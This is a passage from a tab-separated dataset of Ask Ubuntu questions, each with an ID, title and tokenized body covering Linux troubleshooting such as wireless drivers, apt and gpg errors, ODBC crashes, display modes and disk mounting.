pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gt216m [ geforce gt 320m ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) 02:00.0 ethernet controller : broadcom corporation netlink bcm57780 gigabit ethernet pcie ( rev 01 ) 03:00.0 network controller : realtek semiconductor co. , ltd. rtl8192se wireless lan controller ( rev 10 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) uname -a : linux tornado 3.11.0-19-lowlatency # 13-ubuntu smp preempt tue mar 18 22:32:21 utc 2014 x86_64 x86_64 x86_64 gnu/linux lsb_release -a : no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy thanks for your attention , i 'll appreciate any help .
446444	which package provides a given jar ?	how can i determine which apt package i should install to have a certain jar file ? btw : i 'm actually looking to solve xml parser factory has not been configured correctly : provider org.apache.xerces.jaxp.saxparserfactoryimpl not found but i wish to find a general solution . let 's do it by example : i miss org.apache.xerces.jaxp.saxparserfactoryimpl so i can use http : //search.maven.com and determin that i need xerces-1.4.4.jar but in which ubuntu package is that jar located ?
446446	ubuntu does not detect my archos 101xs tablet	i have a 101xs in my possession , and i would like to use it as a test device for some android development project . the main issue i have today is that eclipse ( the adt version ) ca n't seem to detect my tablet . i went to here to download the driver , but i do n't really know what to do with it . i went to the android website , performed the thrid step about /etc/udev/ , but still nothing when executing adb devices i installed mtp as instructed here , but mtp-detect does n't find a thing . i had quite the same problem on windows , but i did n't dig too deeply . i thought my tablet had a connectivity issue , so i returned it , but nothing was found . research i 've done shows that many people want to install ubuntu on their tablet , but apparently few people have issues accessing their tablet from ubuntu ... can anyone help ? is there a better place to find solutions ? thanks in advance .
446449	broadcom will not connect to wireless , ubuntu 12.04 on dell studio 1749	i have trawled through a multitude of questions regarding this problem , tried many of the given solutions and still the problem persists . ethernet works fine but wireless is stuck in a loop trying to connect to my router with the security prompt popping every so often to ask me for the wireless key ( which has been entered correctly ) help would be greatly appreciated : ) edit > result of lspci -nnk | grep -a2 net : 08:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card [ 1028:000c ] kernel driver in use : wl yes driver has been installed and activated from additional drivers
446452	upgrading ubuntu 13.04 to 13.10	i ran the command do-release-upgrade but it tells that no new release is found i want to upgrade ubuntu 13.04 to 13.10 is there any way to upgrade ubuntu 13.04 directly to ubuntu 14.04 ?
446453	gpg : keyblock resource ‘/etc/apt/trusted.gpg.d//webupd8team-sublime-text-3.gpg’ : resource limit	no matter what i do , i get the following error : gpg : keyblock resource ‘/etc/apt/trusted.gpg.d//webupd8team-sublime-text-3.gpg’ : resource limit the original error ( dutch ) original dutch sudo apt-get -f install pakketlijsten worden ingelezen ... klaar boom van vereisten wordt opgebouwd de status informatie wordt gelezen ... klaar 0 pakketten opgewaardeerd , 0 pakketten nieuw geïnstalleerd , 0 te verwijderen en 12 niet opgewaardeerd . 1 pakketten niet volledig geïnstalleerd of verwijderd . door deze operatie zal er 0 b extra schijfruimte gebruikt worden . instellen van apt ( 0.9.9.1~ubuntu3.1 ) ... gpg : sleutelblok bronnen ‘/etc/apt/trusted.gpg.d//webupd8team-sublime-text-3.gpg’ : resource limit gpg : sleutelblok bronnen ‘/etc/apt/trusted.gpg.d//webupd8team-themes.gpg’ : resource limit gpg : sleutelblok bronnen ‘/etc/apt/trusted.gpg.d//webupd8team-tor-browser.gpg’ : resource limit gpg : sleutelblok bronnen ‘/etc/apt/trusted.gpg.d//wfg-0ad.gpg’ : resource limit gpg : sleutelblok bronnen ‘/etc/apt/trusted.gpg.d//yorba-ppa.gpg’ : resource limit gpg : sleutel 437d05b5 : “ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > ” niet veranderd gpg : sleutel fbb75451 : “ubuntu cd image automatic signing key < cdimage @ ubuntu.com > ” niet veranderd gpg : sleutel c0b21f32 : “ubuntu archive automatic signing key ( 2012 ) < ftpmaster @ ubuntu.com > ” niet veranderd gpg : sleutel efe21092 : “ubuntu cd image automatic signing key ( 2012 ) < cdimage @ ubuntu.com > ” niet veranderd gpg : totaal aantal verwerkt : 4 gpg : onveranderd : 4 dpkg : error processing apt ( -- configure ) : subproces installed post-installation script gaf een foutwaarde 2 terug fouten gevonden tijdens behandelen van : apt e : sub-process /usr/bin/dpkg returned an error code ( 1 ) here is the original error in it 's entirety : google translated sudo apt- get- f install reading package lists ... done building dependency tree the status information is read ... ready 0 packages upgraded , 0 newly installed , 0 to remove and 12 not upgraded . 1 not fully installed or removed . through this operation , 0 b of additional disk space will be used . setting up apt ( 0.9.9.1 ~ ubuntu3.1 ) ... gpg : key block sources '/etc/apt/trusted.gpg.d//webupd8team-sublime-text-3.gpg ' : resource limit gpg : key block sources '/etc/apt/trusted.gpg.d//webupd8team-themes.gpg ' : resource limit gpg : key block sources '/etc/apt/trusted.gpg.d//webupd8team-tor - browser.gpg ' : resource limit gpg : key block sources '/etc/apt/trusted.gpg.d//wfg-0ad.gpg ' : resource limit gpg : key block sources '/etc/apt/trusted.gpg.d//yorba-ppa.gpg ' : resource limit gpg : key 437d05b5 : `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' not changed gpg : key fbb75451 : `` ubuntu cd image automatic signing key < cdimage @ ubuntu.com > '' not changed gpg : key c0b21f32 : `` ubuntu archive automatic signing key ( 2012 ) < ftpmaster @ ubuntu.com > '' not changed gpg : key efe21092 : `` ubuntu cd image automatic signing key ( 2012 ) < cdimage @ ubuntu.com > '' not changed gpg : total number processed : 4 gpg : unchanged : 4 dpkg : error processing apt ( -- configure ) : subprocess installed post-installation script returned error 2 back errors were encountered while processing : apt e : sub -process/usr/bin/dpkg returned an error code ( 1 ) things i tried to fix this : sudo apt-get autoremove sudo apt-get clean sudo apt-get check sudo dpkg -- configure -a sudo apt-get -f install and also : sudo apt-mark hold apt ; sudo apt-get -f install when trying to install anything i also get the following : warning : the following packages can not be authenticated !
446458	thunar command line options	are there any command line options that can launch thunar with different display options for that instance ? i sometimes want thunar to use the directory tree sidebar view instead of the usual shortcuts view . is there an option i could use so i can create a launcher for each view ? man thunar and thunar -- help were n't helpful in this regard .
446461	how to show update manager full report of the upgrade in the command line ?	how can i mimic the output of update manager via command line ? i have update manager set to show only `` important security updates '' and the layout with the info is great . is is possible to get similar info via command line ? i 've tried apt several ways but not able to get simiar output . i want to get full update manager output . right now update manager shows 5 upades for me under important security upadates . if i run apt-get update -t precise-security and then apt-get -s upgrade -t precise security it only lists 2 of 5 . also the descriptions is not there . i want to know if it can be done all in one line to show all packages and the little info that goes with it . â
446462	can not ssh to my vm created using openstack from out of openstack server ?	i have installed opensatck using devstack on one server [ nova , horizon , neutron ] which has 1 network card and i trying to associate floating ip to vms but not able to access it with its public ip from a machine from same network ? where is the issue i will be needing 2 network card or it 's different issue ?
446469	can i install php 5.3/5.4 ?	i 'm moving my vbulletin boards to a new server and after going through the regular steps to install lamp , it seems it has installed php 5.5 which vbulletin apparently can not work with . can i install php 5.3 or 5.4 instead ? to be clear , i have removed php for the time being . i 'm not asking about downgrading .
446471	i ca n't download ubuntu dual boot on galaxy nexus	when i try to install ubuntu dual boot on my galaxy nexus , i get this error message when it starts to download : please help , i would like to download ubuntu phone on my galaxy nexus
446474	how can i install a simple daisy player/reader in ubuntu 12.04 or 14.04 ?	i am looking for a simple linux daisy player for middle and high school students . i have tried the pages below and all the software i could find including emerson-player ( this project seems to be abandoned ) and daisy delight ( i do n't know how to install/run this ) . daisy home page software tools recommended on daisy home page wikipedia list of software daisy players daisy delight project
446479	conduit synchronizer do n't delete empty folder	i am using conduit sync tool for updating data from source ( folder in local drive ) to destination ( folder in pen drive ) but when any subfolder deleted from source , conduit only removes all files from corresponding folders in destination but leaves folder as empty folder . so , how to resolve this problem or is there any other sync tool should i use .
446481	how to create compressed iso file system like official ubuntu isos	i am trying to create a custom ubuntu based distro but i ca n't figure out how to create compressed iso file system .
446483	how to investigate mariadb unixodbc issue further	i 've been using mariadb for a while on ubuntu 12.04 with an odbc dsn that i could use in r. today it stopped working and i 've been checking things like reinstalling packages , moving to mariadb 10 ( as an issue which prevented odbc connections has been fixed ) , and generally looking around . i am unfortunately still getting the following error slocke @ host : ~ $ isql -v mydb floating point exception ( core dumped ) can folks advise on a ) how to debug further and /or b ) what the likely issue is ? update 1 further to @ rinzwind 's suggestion and this so question i was able to locate a crash report / core dump . using apport-retrace i have tried to open both isql .crash files present in the /var/crash directory however both get the following error sudo apport-retrace -g -r /var/crash/_usr_bin_isql.0.crash program terminated with signal 8 , arithmetic exception . # 0 0x00007ff459929366 in sqlchar_as_sqlwchar ( ) from /usr/lib/x86_64-linux-gnu/odbc/libmyodbc.so update 2 based on the error message , it looks like a known bug with the mysql odbc connector . it has subsequently been fixed , however , the version it has been fixed in is not available in the ubuntu repository . i 've attempted to download and install a later version but installing it seems very difficult ( to me ! ) with dependencies that ca n't be met by the repository and a complete lack of installation instructions for ubuntu in the install file . odbc config /etc/odbcinst.ini [ mysql ] description = odbc driver for mysql driver = /usr/lib/x86_64-linux-gnu/odbc/libmyodbc.so setup = /usr/lib/x86_64-linux-gnu/odbc/libodbcmys.so fileusage = 1 /etc/odbc.ini [ mydb ] description = database linked to application driver = mysql server = localhost user = abc password = mypwd port = 3306 database = mydb installed mariadb packages dpkg -- list ii mariadb-client 10.0.10+maria- mariadb database client binaries ii mariadb-client 10.0.10+maria- mariadb database core client binaries ii mariadb-common 10.0.10+maria- mariadb database common files ( e.g . /etc/mys ii mariadb-server 10.0.10+maria- mariadb database server ( metapackage dependi ii mariadb-server 10.0.10+maria- mariadb database server binaries ii mariadb-server 10.0.10+maria- mariadb database core server files other packages ii libmyodbc 5.1.10-1 the mysql odbc driver ii libmysqlclient 10.0.10+maria- virtual package to satisfy external depends external depends ii unixodbc 2.2.14p2-5ubun basic odbc tools ii unixodbc-dev 2.2.14p2-5ubun odbc libraries for unix ( development files )
446485	toolbar gradient	how do you modify the toolbar gradient ( the area inside the red rectangle ) in nautilus and other applications ? i tried to play around with various *.css & *.rc files inside /usr/share/themes/ < mythemename > , but with no success . the theme in the screenshot is based on radiance . i 'd appreciate any help .
446487	ubuntu livecd install stuck on `` creating user '' step	i 've been struggling to install ubuntu ( as dual-boot with an existing windows xp installation , on a different drive and partition ) for a couple of days now . i 've already checked the md5 hash for the downloaded iso and dvd files after burning . i have several problems that recur with my installation : at first , my install would go slow as molasses , with only the occasional sluggish sign of activity ( dvd/hd lights , etc . ) before getting stuck at various points early in the process . i researched and found that often nvidia cards are the culprit ( which i have ) . so i tried the nomodeset option , and that finally seemed to get things going ( dvd/hd lights flashing regularly , progress indicator progressing , etc . ) but then the install always froze at the '' creating user '' step . per another forum post , i 've been trying to redo the process doing a `` noquiet '' so i can find out exactly which step is causing the issue , but i have n't been able to because ... now when i try to either boot from the dvd or run the install program , i get the error messages : buffer i/o error on device sr1 , sector nnnn . ata_id [ 257 ] : hdio_get_identity failed for '/dev/sr1/ ' : no message of desired type . ( initramfs ) unable to find live file system . at first i thought it was due to the earlier faulty installs : i went back in windows to clear out the intended ubuntu partitions ( regular and swap ) . but now i am wondering if this is due to the dvd drive : it appears to freeze during the boot process and not respond in time . a `` noquiet '' boot-run reveals error messages like `` soft resetting link ... ata slow to respond ... forcing hard reset ... etc . '' as a test , one time i tried to eject the dvd during the process when things got stuck : it would not respond until the boot process finished failing and i was forced to reboot . this is all odd because this dvd drive worked fine previously in attempted installs , and still works fine in windows xp ! and 'nomodeset ' does not work for me this time . note that my bios must be one of the older ones : it has options for enabling `` legacy support '' for usb , but there are absolutely no menus/options for enabling boot from a usb device , so that workaround is out . now my friends and relatives are looking at me cross-eyed for the idea of trying linux at all ( especially since they 've had easier times with their ms installs ) . somebody please tell me : what the heck is going on ? many thanks !
446490	when will lubuntu 14 final launch	i am using lubuntu 13.10 and ubuntu 14 beta is already out . i want to use lubuntu 14 , when will lubuntu 14 final launch ?
446493	how to preseed installation whithout formatting and mounting a specific partition ?	i want to make a unattended installation of the ubunbu server 12.04 lts using preseed . my partition layout needs to create a partition without formatting and mounting it . how can i do that ?
446498	how to make league of legends run smooth	i am a new to ubuntu and is my first linux distribution tried.and i was wondering if i can play league of legends without lag , i heard people complaining that the game runs with lag on linux so maybe you can tell me what i need to install in order to reach a decent fps while playing . thank you ,
446499	tor for ubuntu 12.04 lts	could someone tell me , step by step , exactly , how should i install correctly tor browser bundle in ubuntu 12.04 lts ? also , how can i be sure that it is working properly ? thanks
446501	is my kernel safe to use ?	i am running ubuntu server 12.04 and my fresh installation is using the 3.2.0-60-generic kernel , however when i go to https : //www.kernel.org/ it says the latest stable kernel is only 3.14 i do n't want to run into problems down the line .
446502	trying to compile latest openssl from source fails with errors	i 'm running ubuntu x86_64 , and want to upgrade to openssl 1.0.1.f . wget < openssl latest > tar -xzvf openssl.tar.gz cd < openssl dir > ./configure -- prefix=/usr make in the console output , i get the following error : collect2 : error : ld returned 1 exit status
446505	know all the using usb bus number	i have connected seven different devices to my system . now i want to know all the bus used by that devices with bus number 's and device name . so how can i do this ? i have used the *lsusb* command . following is the o/p of that command : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 003 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 002 device 003 : id 0c45:6450 microdia bus 001 device 004 : id 413c:8161 dell computer corp . integrated keyboard bus 001 device 005 : id 413c:8162 dell computer corp . integrated touchpad [ synaptics ] bus 001 device 006 : id 413c:8160 dell computer corp. wireless 365 bluetooth in the following output 001 , 002 , 001 , 002,001,002,001,001,001. are the displayed number . is it bus number or any thing else ? also one quick question can we increase usb port bandwidth ?
446507	lenovo x1 carbon - no sign of mobile broadband	i recently installed ubuntu 13.10 on my new lenovo x1 carbon ( 2014 model 20a70027uk ) and have been unable to get mobile broadband working - or even find any sign of the modem . the problem also occurs with 12.04 . i believe the modem is ericsson h5321gw . i followed the instructions here and was unable to find any sign of the modem . output of lsusb : bus 001 device 003 : id 04ca:7036 lite-on technology corp . bus 001 device 002 : id 8087:8000 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 003 : id 8087:07dc intel corp . bus 002 device 002 : id 138a:0017 validity sensors , inc . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub output of lspci -nn : 00:00.0 host bridge [ 0600 ] : intel corporation haswell-ult dram controller [ 8086:0a04 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation haswell-ult integrated graphics controller [ 8086:0a16 ] ( rev 09 ) 00:03.0 audio device [ 0403 ] : intel corporation device [ 8086:0a0c ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation lynx point-lp usb xhci hc [ 8086:9c31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation lynx point-lp heci # 0 [ 8086:9c3a ] ( rev 04 ) 00:19.0 ethernet controller [ 0200 ] : intel corporation ethernet connection i218-v [ 8086:1559 ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation lynx point-lp hd audio controller [ 8086:9c20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation lynx point-lp pci express root port 6 [ 8086:9c1a ] ( rev e4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation lynx point-lp pci express root port 3 [ 8086:9c14 ] ( rev e4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation lynx point-lp usb ehci # 1 [ 8086:9c26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation lynx point-lp lpc controller [ 8086:9c43 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation lynx point-lp sata controller 1 [ ahci mode ] [ 8086:9c03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation lynx point-lp smbus controller [ 8086:9c22 ] ( rev 04 ) 03:00.0 network controller [ 0280 ] : intel corporation wireless 7260 [ 8086:08b2 ] ( rev 83 ) nm-tool only shows wlan0 and eth0 . any ideas on how i can get mobile broadband working ?
446508	installation of wireless printer canon pixma mg5450	how do i install my canon pixma mg5450 . i have downloaded the linux drivers from canon for the mg5450 but my ubuntu 12.04 does not recognise them .
446510	how do i get sound from speakers instead of tv over hdmi	i 'm a noob with this os . i installed ubuntu today and it 's up and working surprisingly fast ^^ my only issue is : i got my pc connected to speakers and connected to my tv via hdmi , when i try to play sound it plays only through the tv-speakers and my other speakers do n't play any sound . anyone knows how i can make it play sound from my normal speakers instead of tv speakers ?
446513	how do i install wordpress from tar.gz ?	so i have wordpress-3.8.1.tar.gz whch i want to install ( i know it 's older version ) . i extract this file and ./configure says : bash : ./configure : no such file or directory so how do i install this wordpress version from tar.gz ? it should be simple but i can not figure it out .
446517	usb sound card ( just for headphone jack , not recording )	so i have found a few questions that asked about recording equipment that work with linux through usb , but i do n't need anything so extravagant ( or expensive ! ) , i just need something to be able to plug headphones in and listen to music at work . the motherboard has no sound card , and i would love to just us a cheap usb one ( some are as little as 4 dollars , but i am having trouble finding if they will work with ubuntu or not ) . do you guys have any suggestions of ones that will work ? i am sorry if this has been asked before , but everything i have found just talks about much more advanced equipment than i need .
446518	connecting to a crt television through an hdmi to analog converter	running kubuntu 13.10 on a lenvo g500 laptop , trying to connect an old crt television as a second screen . since the tv is old and only has analog inputs , i ordered an hdmi- > component video converter and am using the laptop 's hdmi output to send the signal to the converter . i suspect it might be an edid kind of thing , but i 'm still pretty clueless in the field.. things are -almost- okay . with everything hooked up i get some image on the tv , but it 's garbled ( let 's say we let the discoloration slide ) . stackexchange seems angry with me for trying to post an image , but here goes : http : //i.stack.imgur.com/4hedz.jpg ( sound is perfect regardless of the image ) i 've tried using cvt and xrandr with different resolutions and options for a while , but to no avail . the best i 've found so far is shown in the above image . was achieved with one of the automatically detected resolutions : xrandr -- output hdmi1 -- mode `` 720x480 '' -- rate 60 i 've added a whole bunch of crap modelines to hdmi1 , so you can safely ignore most of the xrandr -- verbose output : hdmi1 connected 1024x768+377+0 ( 0xb8 ) normal ( normal left inverted right x axis y axis ) 129mm x 73mm identifier : 0x45 timestamp : 69121845 subpixel : unknown gamma : 1.0:1.0:1.0 brightness : 1.0 clones : crtc : 1 crtcs : 0 1 2 transform : 1.422211 0.000000 0.000000 0.000000 1.599991 0.000000 0.000000 0.000000 1.000000 filter : bilinear edid : 00ffffffffffff000d091bbd00000000 24160103801009780a1eac9859568528 29525720000001010101010101010101 0101010101018c0ad08a20e02d10103e 96008149000000180000001000000000 00000000000000000000000000fc0043 48522048444d4952580a202000000010 00173d0d2e0f000a2020202020200174 02031741438210042309077783010000 66030c001000800000001000e02d1010 60a2002d100000000000000010004031 200c4055008160000808180000001000 00000000000000000000000000000000 10000000000000000000000000000000 00001000000000000000000000000000 000000000000000000000000000000a0 broadcast rgb : automatic supported : automaticfulllimited 16:235 audio : auto supported : force-dvioffautoon 720x480 ( 0x4a ) 27.0mhz -hsync -vsync +preferred h : width 720 start 736 end 798 total 858 skew 0 clock 31.5khz v : height 480 start 489 end 495 total 525 clock 59.9hz 1920x1080 ( 0xb4 ) 148.5mhz +hsync +vsync h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 67.5khz v : height 1080 start 1084 end 1089 total 1125 clock 60.0hz 1920x1080 ( 0xb5 ) 148.4mhz +hsync +vsync h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 67.4khz v : height 1080 start 1084 end 1089 total 1125 clock 59.9hz 1280x720 ( 0xb6 ) 74.2mhz +hsync +vsync h : width 1280 start 1390 end 1430 total 1650 skew 0 clock 45.0khz v : height 720 start 725 end 730 total 750 clock 60.0hz 1280x720 ( 0xb7 ) 74.2mhz +hsync +vsync h : width 1280 start 1390 end 1430 total 1650 skew 0 clock 45.0khz v : height 720 start 725 end 730 total 750 clock 59.9hz 720x480 ( 0xb8 ) 27.0mhz -hsync -vsync *current h : width 720 start 736 end 798 total 858 skew 0 clock 31.5khz v : height 480 start 489 end 495 total 525 clock 60.0hz 640x480 ( 0xb9 ) 25.2mhz -hsync -vsync h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 60.0hz 640x480 ( 0xb3 ) 25.2mhz -hsync -vsync h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 59.9hz 640x480_60.00 ( 0x40c ) 23.8mhz -hsync +vsync h : width 640 start 664 end 720 total 800 skew 0 clock 29.7khz v : height 480 start 483 end 487 total 500 clock 59.4hz 1024x768_60.00 ( 0x40d ) 63.5mhz -hsync +vsync h : width 1024 start 1072 end 1176 total 1328 skew 0 clock 47.8khz v : height 768 start 771 end 775 total 798 clock 59.9hz 800x600_60.00 ( 0x40e ) 38.2mhz -hsync +vsync h : width 800 start 832 end 912 total 1024 skew 0 clock 37.4khz v : height 600 start 603 end 607 total 624 clock 59.9hz 800x600_75.00 ( 0x410 ) 49.0mhz -hsync +vsync h : width 800 start 840 end 920 total 1040 skew 0 clock 47.1khz v : height 600 start 603 end 607 total 629 clock 74.9hz 800x600_30.00 ( 0x411 ) 18.0mhz -hsync +vsync h : width 800 start 824 end 896 total 992 skew 0 clock 18.1khz v : height 600 start 603 end 607 total 614 clock 29.6hz 720x480_75.00 ( 0x46f ) 34.2mhz -hsync +vsync h : width 720 start 752 end 816 total 912 skew 0 clock 37.6khz v : height 480 start 483 end 493 total 504 clock 74.5hz 640x480_75.00 ( 0x4a9 ) 30.8mhz -hsync +vsync h : width 640 start 664 end 728 total 816 skew 0 clock 37.7khz v : height 480 start 483 end 487 total 504 clock 74.8hz 1024x768_75.00 ( 0x4ec ) 82.0mhz -hsync +vsync h : width 1024 start 1088 end 1192 total 1360 skew 0 clock 60.3khz v : height 768 start 771 end 775 total 805 clock 74.9hz 1024x768_75.00_gtf ( 0x4ed ) 81.9mhz -hsync +vsync h : width 1024 start 1080 end 1192 total 1360 skew 0 clock 60.2khz v : height 768 start 769 end 772 total 802 clock 75.1hz 720x480_75.00_gtf ( 0x4f1 ) 34.9mhz -hsync +vsync h : width 720 start 752 end 824 total 928 skew 0 clock 37.7khz v : height 480 start 481 end 484 total 502 clock 75.0hz 720x480r ( 0x4f2 ) 26.0mhz +hsync -vsync h : width 720 start 768 end 800 total 880 skew 0 clock 29.5khz v : height 480 start 483 end 493 total 499 clock 59.2hz 600x480r ( 0x4f3 ) 22.5mhz +hsync -vsync h : width 600 start 648 end 680 total 760 skew 0 clock 29.6khz v : height 480 start 483 end 490 total 496 clock 59.7hz 640x480r ( 0x52d ) 23.5mhz +hsync -vsync h : width 640 start 688 end 720 total 800 skew 0 clock 29.4khz v : height 480 start 483 end 487 total 494 clock 59.5hz 800x600r ( 0x56d ) 35.5mhz +hsync -vsync h : width 800 start 848 end 880 total 960 skew 0 clock 37.0khz v : height 600 start 603 end 607 total 618 clock 59.8hz 480x720_60.00 ( 0x5c3 ) 27.8mhz -hsync +vsync h : width 480 start 504 end 552 total 624 skew 0 clock 44.5khz v : height 720 start 723 end 733 total 748 clock 59.5hz 720x480_60.00_hsync ( 0x60b ) 26.8mhz +hsync +vsync h : width 720 start 744 end 808 total 896 skew 0 clock 29.9khz v : height 480 start 483 end 493 total 500 clock 59.7hz 720x480_60.00_vsync ( 0x60c ) 26.8mhz -hsync -vsync h : width 720 start 744 end 808 total 896 skew 0 clock 29.9khz v : height 480 start 483 end 493 total 500 clock 59.7hz 720x480_60.00_vsync2 ( 0x60d ) 26.8mhz +hsync -vsync h : width 720 start 744 end 808 total 896 skew 0 clock 29.9khz v : height 480 start 483 end 493 total 500 clock 59.7hz 720x480_60_interlaced ( 0x654 ) 26.8mhz -hsync +vsync interlace h : width 720 start 744 end 808 total 896 skew 0 clock 29.9khz v : height 480 start 483 end 493 total 500 clock 119.4hz 720x480_50 ( 0x682 ) 22.2mhz -hsync +vsync h : width 720 start 744 end 808 total 896 skew 0 clock 24.8khz v : height 480 start 483 end 493 total 497 clock 50.0hz 1424x480 ( 0x6be ) 53.0mhz -hsync +vsync h : width 1424 start 1464 end 1600 total 1776 skew 0 clock 29.8khz v : height 480 start 483 end 493 total 500 clock 59.7hz 720x480_30.00 ( 0x6c3 ) 13.0mhz -hsync +vsync h : width 720 start 744 end 808 total 896 skew 0 clock 14.5khz v : height 480 start 483 end 493 total 496 clock 29.3hz 640x480_interlaced ( 0x6ce ) 23.8mhz -hsync +vsync interlace h : width 640 start 664 end 720 total 800 skew 0 clock 29.7khz v : height 480 start 483 end 487 total 500 clock 118.8hz 576x432 ( 0x6cf ) 19.2mhz -hsync +vsync h : width 576 start 592 end 648 total 720 skew 0 clock 26.7khz v : height 432 start 435 end 439 total 450 clock 59.4hz the fact the physical dimensions show up as 129mm x 73mm is suspect , as is the 1024x768+377+0 line , but i feel kind of helpless to change them.. any help would be much appreciated !
446519	error when installing ubuntu 13.10 black screen/white flashing dash	yesterday i 've tried to install ubuntu on my windows 7 desktop pc . i 've burned the iso on a dvd , and installed the help boot . then it asked to reboot , after that it took me to the ubuntu purple screen and it went smooth , i could try the features of ubuntu , entered mozilla and everything . but when i put install ubuntu 13.10 ( inside of ubuntu interface ) , guided me through the steps . but since i could n't see the guided installation on the ubuntu website , i forgot to check 'install third party apps ' or something like that . so when i finally put 'install ' , an error message pop up `` error informing the kernel about modifications to partition /dev/sda2 - device or resource busy . this means that linux wo n't know about any changes you made to /dev/sda2 until you reboot - so you should n't mount it or use it in any way before rebooting '' i tried to click ignore , cancel , close it . but it did nothing , behind this message , was the location map . the rest of the ubuntu interface worked just fine , except i could n't go back to windows or close that error message . so i rebooted , after the startup screen ( not the windows one ) , it went black screen with flashing/intermitent white dash . just that . i ca n't do anything else in there but rebooting . i 'm new in all of this and i 'm starting to regret installing ubuntu at all . from what i 've tried , i can access bios , but then i 'm completely lost . please help me t.t i would just like to go back to windows if the ubuntu fix it 's too complicated u.u
446520	three os in one system	i have been using ubuntu and windows , which are installed side by side for about 2 and a half year by now ( although i hardly open windows ) and i 've had my ups and downs . but now i 'm trying to install another os ( chrome os ) along with them on a third partition . will it pose any problem for my current oss . that is should i do it or not .
446521	how to show all windows of an application ?	i have an application using multiple windows . how can i quickly bring all the windows of that application to the foreground ? when i scroll through the applications with the scroll-wheel it only shows one window . when going to the next window , the last window is brought to the background again . when i click on the application icon , i get a full-screen overview of all the windows . i have to select each window manually and move my mouse across half the screen several times . my best solution so far is minimizing all windows ( ctrl+super+d ) and then show the windows of my application using the scroll-wheel . is there a better solution ? i am using ubuntu 14.04 lts .
446522	font issues.. ttf malyalm fonts are not working	i have installed ttf malayalam font package with six fonts like anjali old lipi , suruma etc. , . but when i choose this fonts in libre office writer or even in the character map the english letters are coming instead of the vernacularb lettres . why it happens ? how to solve this ?
446523	auto-mount 2 hdd with no partitions on startup without losing existing data	i am fairly new to ubuntu but reasonably confident with cli . i am running 12.04 and have 3 hdd , two with media content that i want to auto-mount on startup . the problem is that they contain 3tb of data each , and i do n't want to lose this data in recreating partitions and directories . the two i want to auto-mount on startup are sdb and sdc - can someone recommend the best way of doing this , either via editing fstab or through a gui ? i noted that 12.10 has the option to auto-mount via the disk utility , but when i opted to upgrade to 12.10 , i received a warning that my dell t110 doesnt have a supported graphics card . any thoughts please ? fdisk -l : disk /dev/sda : 250.0 gb , 250000000000 bytes 255 heads , 63 sectors/track , 30394 cylinders , total 488281250 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000b7bd6 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 488280063 243889153 5 extended /dev/sda5 501760 488280063 243889152 8e linux lvm disk /dev/sdb : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table disk /dev/sdc : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/sdc does n't contain a valid partition table disk /dev/mapper/cambuimedia-root : 247.6 gb , 247560404992 bytes 255 heads , 63 sectors/track , 30097 cylinders , total 483516416 sectors units = sectors of 1 * 512 = 512 bytes sector size ( 